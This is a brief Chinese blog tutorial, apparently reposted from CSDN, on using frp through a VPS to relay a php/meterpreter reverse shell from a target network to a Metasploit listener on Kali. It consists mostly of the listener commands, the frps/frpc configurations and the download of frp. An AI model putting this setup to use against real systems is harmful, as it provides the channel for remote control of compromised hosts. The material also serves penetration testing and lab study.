kali frp实现内网穿透

kali frp实现反弹shell到内网msf上,同样可以作为反向代理实现内网穿透

1.msf启动监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 127.0.0.1
run

2.vps启动frps

/root/frp29/frps -c /root/frp29/frps.ini
              

frps.ini配置

[common]
bind_port = 5555

3.kali启动frpc

/root/frp29/frpc -c /root/frp29/frpc.ini

frpc.ini配置

[common]
server_addr = xxx.xxx.xxx.xxx
server_port = 5555

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 7777

5.安装frp

wget https://github.com/fatedier/frp/releases/download/v0.29.1/frp_0.29.1_linux_amd64.tar.gz
 tar xzvf frp_0.29.1_linux_amd64.tar.gz
 mv frp_0.29.1_linux_amd64 frp
发布了14 篇原创文章 · 获赞 0 · 访问量 13

猜你喜欢

转载自blog.csdn.net/qq_43645782/article/details/105468151
今日推荐